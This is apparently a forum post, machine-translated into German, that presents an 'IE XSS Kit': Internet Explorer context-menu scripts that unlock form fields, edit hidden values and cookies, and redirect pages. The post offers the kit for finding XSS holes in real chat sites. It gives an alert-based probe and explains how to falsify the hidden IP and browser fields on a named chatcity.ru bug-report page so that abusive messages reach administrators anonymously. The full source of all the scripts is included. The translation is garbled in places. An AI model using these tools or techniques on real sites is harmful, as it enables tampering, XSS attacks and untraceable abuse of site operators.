IE XSS Kit



Ich habe mich hier nach Belieben entschlossen, eine Reihe von Tools für xss in Betracht zu ziehen, die an der Stelle von Antichat liegen. Download IE xss kit Eine weitere kleine Einführung. Ich habe das alles seitdem in diesem Abschnitt gepostet Dieses Kit hilft Ihnen dabei, Schwachstellen im Chat zu finden und Ihre Fähigkeiten leicht zu verbessern. Heute werde ich kurz über den Formulareditor sprechen:

Form_Select-one2Text

Mit diesem Formulareditor können wir Frames mit verdrahteten Optionen in unser eigenes Testgelände verwandeln.

Beginnen wir mit der einfachsten, in den meisten Chats gibt es eine Auswahl an Farben, die in HTML-Form folgendermaßen ausgeführt werden:

  <OPTION selected VALUE = "Black" STYLE = "color: black"> Schwarz </ OPTION> In Wirklichkeit sieht es so aus:
IPB-Image Wie Sie sehen können, gibt es verdrahtete Farben, die Verwendung anderer ist noch nicht möglich. 
 Jetzt bewegen wir den Mauszeiger auf den Rahmen mit der Farbauswahl, 
 Klicken Sie mit der rechten Maustaste und wählen Sie den Befehl Form_Select-one2Text
 
 Und dieser Rahmen mit einer strengen Farbauswahl wird zu einem leeren Rahmen mit der Fähigkeit, dort beliebigen Text zu schreiben. 
 (Nur funktioniert nicht alles, was Sie schreiben). 
 So sieht es nach dem Anwenden von Form_Select-one2Text aus :
IPB-Image Jetzt haben Sie die Möglichkeit, einen beliebigen Farbcode einzugeben, beispielsweise #FFFFFF. 
 Mit diesem Befehl können auch viele Frames bearbeitet werden. 
 (Zum Beispiel habe ich mich in einem Chat bei der Auswahl eines Geschlechts zu "Nightmare Hermophrodite" gemacht). 
 Sie können auch direkt nach xss-Schwachstellen suchen und diesen Code in den Frames ersetzen, die uns zur Verfügung stehen.
 Hier sind viele Codes, die eine Warnung auslösen und tatsächlich xss finden können. 
 Sie sind jetzt mit dem Formulareditor Form_Select-one2Text vertraut .



Form_Method2Text, Form_Hidden2Text

Beginnen wir mit Form_Method2Text . Das Team selbst wird nicht wirklich gebraucht, weil Es öffnet den Rahmen, in dem die Arbeitsweise mit der Seite geschrieben ist. Die grundlegendsten Methoden sind: post and get. Die Post-Methode bedeutet, dass Sie Ihre Daten auf der Seite eingeben. Am häufigsten wird es in Foren, Gästebüchern, Chatrooms usw. gefunden. Die get-Methode bedeutet, dass Sie alle Daten von der Seite selbst abrufen. Meistens wird sie in Suchmaschinen verwendet. Diese Methode ist fast überall zu finden. Im Allgemeinen ist dieser Befehl unauffällig, aber wie der Rest ermöglicht er den Zugriff auf einen offenen Frame. Und natürlich wird in einigen Internetquellen das Javascript erfolgreich ausgeführt, wenn Sie den Beitrag ersetzen oder durch xss-Code erhalten.

Gehen Sie nun den Befehl Form_Hidden2Text durch . Mit diesem Befehl können Sie die auf der Seite genähten Daten anzeigen (sortieren) und korrigieren.

Ich werde Ihnen ein gutes Beispiel zeigen. Ich habe diese Methode in einem der Chat-City-Chats getestet, wenn Sie einen Fehlerbericht senden müssen.

  Hier ist es: http://www.38557.chatcity.ru/bug/?err=IllegalChannel(get_ch)&www.38557.chatcity.ru&
 Ich werde keinen Bildschirm machen, weil  Folgen Sie dem Link und überzeugen Sie sich selbst. 
 Jetzt verwenden wir auf dieser Seite den Befehl Form_Hidden2Text . 
 Wie Sie sehen, werden Frames mit den Daten des Benutzers geöffnet, der diese Seite besucht hat. 
 (Auch sie sind sortiert) Jetzt können sie bearbeitet werden, ich werde erklären, warum dies notwendig ist. 
 Beim Senden eines Fehlerberichts werden genau die Daten an den Chatcity-Administrator gesendet 
 die uns zur Bearbeitung zur Verfügung gestellt wurde. 
 Dies deutet darauf hin, dass Sie diesmal anonym bleiben können.  Hier ist ein Bildschirm von dem, was uns offenbart wurde:
IPB-Image Wie Sie sehen können, können Sie alles löschen oder die Daten anderer Personen ersetzen.
 Und hier ist das gleiche, was in Sorten gespeichert ist:
<input type=hidden name=err value="IllegalChannel(get_ch)"> <input type=hidden name=browser value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"> <input type=hidden name=addr value="айпи мой :) :) )"> <input type=hidden name=via value=""> <input type=hidden name=referer value="http://www.38557.chatcity.ru/kpobatka"> <input type=hidden name=args value="www.38557.chatcity.ru&">

 Aber jetzt können wir alle bearbeiten und anonym bleiben, indem wir ein paar liebevolle Schreiben an die Verwaltung schreiben

 Das ist alles, was diese beiden Teams tun können.


Form_Target2Text

Das Wort Ziel bedeutet für sich genommen das Ziel und Ihre weitere "Richtung" nach jeder Aktion. In diesem Fall öffnen wir bei Verwendung dieses Befehls auch den zur Bearbeitung verfügbaren Rahmen. In vielen Fällen (wenn das Ziel nicht in Javascripts geschrieben ist) wird bei Verwendung des Befehls ein Link angezeigt, an den Sie nach einer Aktion gesendet werden. Es kann zumindest etwas sein, das auf OK, Beenden usw. klickt. In diesem Fall ist nur der Befehl Form_Target2Text sehr praktisch, um Xss zu finden. Sie können den xss-Code dem bereits vorhandenen Link zuweisen oder einfach den Link löschen und den xss-Code registrieren.

LocationReplace

Wenn dieser Befehl ausgeführt wird, wird das Skript über die Eingabeaufforderungsmethode angefordert. Die Anforderung wird an eine beliebige Seite weitergeleitet. Im Allgemeinen werde ich nicht um den heißen Brei herumreden, dieser Befehl ist bei der Suche nach xss ziemlich nutzlos, weil Damit Sie nicht schreiben, wird Ihr Text an die ursprüngliche Adresse der Seite angehängt, von der aus Sie den Befehl ausgeführt haben.

  Beispiel: _http: //www.ya.ru/
 Wir verwenden LocationReplace , ein Fenster öffnet sich, wir geben dort ein einfaches Design ein:

 <script> alert (/ test /) </ script>

 Klicken Sie auf OK, und wir werden weitergeleitet zu: http://www.ya.ru/ <script> alert (/ test /) </ script>

 Kein Sinn .. Diese Methode ist für diejenigen, die zu faul sind, um den Code in die Adressleiste zu schreiben und nicht mehr. 
 Es kann auch als Überweiser verwendet werden.


Alle HTML-Codes werden vom IE xss-Kit betrieben.


Cookies:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zExpires() { var expires = new Date(); expires.setYear(expires.getYear() + 10); return expires.toUTCString(); } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zCookie = zDocument.cookie; var zNew = zWindow.prompt('New Cookie?', zCookie); if (zNew != null) { var zNewCookie = zWindow.prompt('New Cookie:', '; EXPIRES=' + zExpires() + ';'); if (zNewCookie != null) zDocument.cookie = zNewCookie; } </script>



Action2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { with (zForms[i]) { if (!zForms[i].zAction) { innerHTML = '<input type="text" id="zAction" value="' + zConvert(action) + '" title="action" onChange="document.forms[' + i + '].action = this.value">' + innerHTML; } } } </script>



Checkbox2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { with (zForms[i].elements[j]) { if (type == 'checkbox') { outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + zConvert(value) + '" title="' + type + ' / ' + name + '" onDblClick="this.outerHTML = \'\'">'; } } } } </script>



EventsOFF:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var ii in zForms[i]) { if (ii.match(/^on/i) && (zForms[i].getAttribute(ii) != null)) { zForms[i].setAttribute(ii, null); } } for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { for (var jj in zForms[i].elements[j]) { if (jj.match(/^on/i) && (zForms[i].elements[j].getAttribute(jj) != null)) { zForms[i].elements[j].setAttribute(jj, null); } } } } </script>



Hidden2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { with (zForms[i].elements[j]) { if (type == 'hidden') { outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + zConvert(value) + '" title="' + type + ' / ' + name + '">'; } } } } </script>



Method2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { with (zForms[i]) { if (!zForms[i].zMethod) { innerHTML = '<input type="text" id="zMethod" value="' + zConvert(method) + '" title="method" onChange="document.forms[' + i + '].method = this.value">' + innerHTML; } } } </script>



Radio2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { with (zForms[i].elements[j]) { if (type == 'radio') { outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + zConvert(value) + '" title="' + type + ' / ' + name + '" onDblClick="this.outerHTML = \'\'">'; } } } } </script>



Select-One2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { with (zForms[i].elements[j]) { if (type == 'select-one') { outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + zConvert(value) + '" title="' + type + ' / ' + name + '">'; } } } } </script>



Target2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { with (zForms[i]) { if (!zForms[i].zTarget) { innerHTML = '<input type="text" id="zTarget" value="' + zConvert(target) + '" title="target" onChange="document.forms[' + i + '].target = this.value">' + innerHTML; } } } </script>



LocationReplace:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru var zWindow = external.menuArguments; var zLocation = zWindow.location; var zNewLocation = zWindow.prompt('New Location:', zLocation); if (zNewLocation != null) zLocation.replace(zNewLocation); </script>